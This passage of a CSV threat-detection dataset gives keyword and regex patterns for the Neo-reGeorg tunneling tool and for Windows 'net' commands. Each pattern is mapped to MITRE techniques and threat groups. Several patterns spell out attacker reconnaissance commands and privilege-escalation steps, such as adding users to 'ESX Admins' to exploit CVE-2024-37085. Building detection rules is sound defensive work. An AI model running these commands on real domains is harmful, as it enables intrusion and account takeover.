Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*cacc832d9daf18d621c26497f5affd8b6b27cf5e34332b8bd95da127efdbb5e1*",".{0,1000}cacc832d9daf18d621c26497f5affd8b6b27cf5e34332b8bd95da127efdbb5e1.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*cb183ce9401cd7ad838bedb22fb49717d5de7da10b8f64781aceb4912d6f5ec8*",".{0,1000}cb183ce9401cd7ad838bedb22fb49717d5de7da10b8f64781aceb4912d6f5ec8.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*cc1a1ea3b0a719e36037ca340e24d6d574324578267bdfc38c3b4710289ec578*",".{0,1000}cc1a1ea3b0a719e36037ca340e24d6d574324578267bdfc38c3b4710289ec578.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*cc284e9b0925fd814e4aa3d125804f7cde054863c3c467492a14e8f73a4cbced*",".{0,1000}cc284e9b0925fd814e4aa3d125804f7cde054863c3c467492a14e8f73a4cbced.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data 
Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*cd152f7de2ba0b3fc2e6053141b7bf326bca81aed5d5efa709bb10baa801cdd2*",".{0,1000}cd152f7de2ba0b3fc2e6053141b7bf326bca81aed5d5efa709bb10baa801cdd2.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*cm9vdDppcyB0d2VsdmU=*",".{0,1000}cm9vdDppcyB0d2VsdmU\=.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*d77577b4a183167f9e8b5f798e3f71fa4f41c81d1db9ce37c68bb6decfbdf737*",".{0,1000}d77577b4a183167f9e8b5f798e3f71fa4f41c81d1db9ce37c68bb6decfbdf737.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*d80046ee572c3222790560fc51c02de131507d5425bed6cecca98bc3f3ca50e9*",".{0,1000}d80046ee572c3222790560fc51c02de131507d5425bed6cecca98bc3f3ca50e9.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data 
Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*dc57b353d32389a0af8a7ccb2054633ac502d899bb5bc9e656e91849215a57a1*",".{0,1000}dc57b353d32389a0af8a7ccb2054633ac502d899bb5bc9e656e91849215a57a1.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*debbc69c2926f0062b8243a484cd5710c6ba290f738e26a6e6ff403c3a536843*",".{0,1000}debbc69c2926f0062b8243a484cd5710c6ba290f738e26a6e6ff403c3a536843.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*e10eff3227d730806c99dc8ac0f38a2262ed5ab3a86d90b4acb7efbb2d6d2def*",".{0,1000}e10eff3227d730806c99dc8ac0f38a2262ed5ab3a86d90b4acb7efbb2d6d2def.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*e7836e1d44fe8ea29276fba8ea5fd5c94a242c2ec8d04850a62625c7792bff46*",".{0,1000}e7836e1d44fe8ea29276fba8ea5fd5c94a242c2ec8d04850a62625c7792bff46.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data 
Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*e9894baec4b491e0ee3bce3a760b33546ee03270f9ea6155f5dbebd66d820c11*",".{0,1000}e9894baec4b491e0ee3bce3a760b33546ee03270f9ea6155f5dbebd66d820c11.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*f7b6475de06cdecd9b187a735bb3f960fa56bc12c7205225e0550dd7a7814a34*",".{0,1000}f7b6475de06cdecd9b187a735bb3f960fa56bc12c7205225e0550dd7a7814a34.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*f7c1d9613d4f4a7d5cc193f7a52c83aa3be1abf466de9ef0a9e2b2faaa846a69*",".{0,1000}f7c1d9613d4f4a7d5cc193f7a52c83aa3be1abf466de9ef0a9e2b2faaa846a69.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*fa2f44b31d65e2b907ad9a3e1ddf95d9aac53905b53ff2bfeb178a7746b0cafe*",".{0,1000}fa2f44b31d65e2b907ad9a3e1ddf95d9aac53905b53ff2bfeb178a7746b0cafe.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data 
Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*fdaaa6bd9cbb9875b35f339dbd7b7481bc3aef2e2eb59caa2b77ffbd34ed079b*",".{0,1000}fdaaa6bd9cbb9875b35f339dbd7b7481bc3aef2e2eb59caa2b77ffbd34ed079b.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*L-codes/Neo-reGeorg*",".{0,1000}L\-codes\/Neo\-reGeorg.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","1","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*NeoGeorg says, 'All seems fine'*",".{0,1000}NeoGeorg\ssays,\s\'All\sseems\sfine\'.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*neoreg.py generate*",".{0,1000}neoreg\.py\sgenerate.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*neoreg.py -k * -u 
http*.php*",".{0,1000}neoreg\.py\s\-k\s.{0,1000}\s\-u\shttp.{0,1000}\.php.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*\net.exe"" accounts*",".{0,1000}\\net\.exe\""\saccounts.{0,1000}","greyware_tool_keyword","net","Enumerate local accounts","T1087.001 - T1003","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*\net.exe* localgroup admin*",".{0,1000}\\net\.exe.{0,1000}\slocalgroup\sadmin.{0,1000}","greyware_tool_keyword","net","showing users in a privileged group. 
","T1069 - T1003","TA0007 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*\net.exe* sessions*",".{0,1000}\\net\.exe.{0,1000}\ssessions.{0,1000}","greyware_tool_keyword","net","List active SMB session","T1135 - T1047","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*\net.exe* view */domain*",".{0,1000}\\net\.exe.{0,1000}\sview\s.{0,1000}\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*\net1 sessions*",".{0,1000}\\net1\ssessions.{0,1000}","greyware_tool_keyword","net","List active SMB session","T1135 - T1047","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - 
Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*net group ""domain admins"" /domain*",".{0,1000}net\s\sgroup\s\""domain\sadmins\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net group ""Domain Computers"" /domain*",".{0,1000}net\s\sgroup\s\""Domain\sComputers\""\s\/domain.{0,1000}","greyware_tool_keyword","net","List computers in the Domain Computers group of the current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net group ""domain computers"" /domain*",".{0,1000}net\s\sgroup\s\""domain\scomputers\""\s\/domain.{0,1000}","greyware_tool_keyword","net","List computers in the Domain Computers group of the current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - 
APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net group ""enterprise admins"" /domain*",".{0,1000}net\s\sgroup\s\""enterprise\sadmins\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from enterprise admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net group ""ESX Admins"" /domain /add*",".{0,1000}net\s\sgroup\s\""ESX\sAdmins\""\s\/domain\s\/add.{0,1000}","greyware_tool_keyword","net","potential CVE-2024-37085 exploitation","T1098","TA0003 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Privilege Escalation","https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*net group ""ESX Admins""*",".{0,1000}net\s\sgroup\s\""ESX\sAdmins\"".{0,1000}","greyware_tool_keyword","net","potential CVE-2024-37085 exploitation","T1098","TA0003 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan 
- APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Privilege Escalation","https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*net user admin P@ssw0rd!*",".{0,1000}net\s\suser\sadmin\sP\@ssw0rd!.{0,1000}","greyware_tool_keyword","net","potential CVE-2024-37085 exploitation","T1098","TA0003 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Privilege Escalation","https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*net .exe* group ""ESX Admins""*",".{0,1000}net\s\.exe.{0,1000}\sgroup\s\""ESX\sAdmins\"".{0,1000}","greyware_tool_keyword","net","potential CVE-2024-37085 exploitation","T1098","TA0003 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Privilege Escalation","https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*net group ""Domain Admins"" 
/domain*",".{0,1000}net\sgroup\s\""Domain\sAdmins\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net group ""domain computers"" /domain*",".{0,1000}net\sgroup\s\""domain\scomputers\""\s\/domain.{0,1000}","greyware_tool_keyword","net","List PCs connected to the domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt/blob/alperen_ugurlu_hack/AD_Enumeration_Hunt.ps1","1","0","N/A","N/A","6","1","92","20","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" "*net group *Account Operators* /domain*",".{0,1000}net\sgroup\s.{0,1000}Account\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE 
BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net group *Backup Operators* /domain*",".{0,1000}net\sgroup\s.{0,1000}Backup\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net group *Domain Computers* /domain*",".{0,1000}net\sgroup\s.{0,1000}Domain\sComputers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net group *Domain Controllers* /domain*",".{0,1000}net\sgroup\s.{0,1000}Domain\sControllers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE 
BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net group *Domain Controllers*/domain*",".{0,1000}net\sgroup\s.{0,1000}Domain\sControllers.{0,1000}\/domain.{0,1000}","greyware_tool_keyword","net","Query Domain Controllers Computers in the current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*net group *Enterprise Admins* /domain*",".{0,1000}net\sgroup\s.{0,1000}Enterprise\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net group *Exchange Trusted Subsystem* /domain*",".{0,1000}net\sgroup\s.{0,1000}Exchange\sTrusted\sSubsystem.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - 
Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net group *Microsoft Exchange Servers* /domain*",".{0,1000}net\sgroup\s.{0,1000}Microsoft\sExchange\sServers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net group *Print Operators* /domain*",".{0,1000}net\sgroup\s.{0,1000}Print\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net group *Schema Admins* /domain*",".{0,1000}net\sgroup\s.{0,1000}Schema\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE 
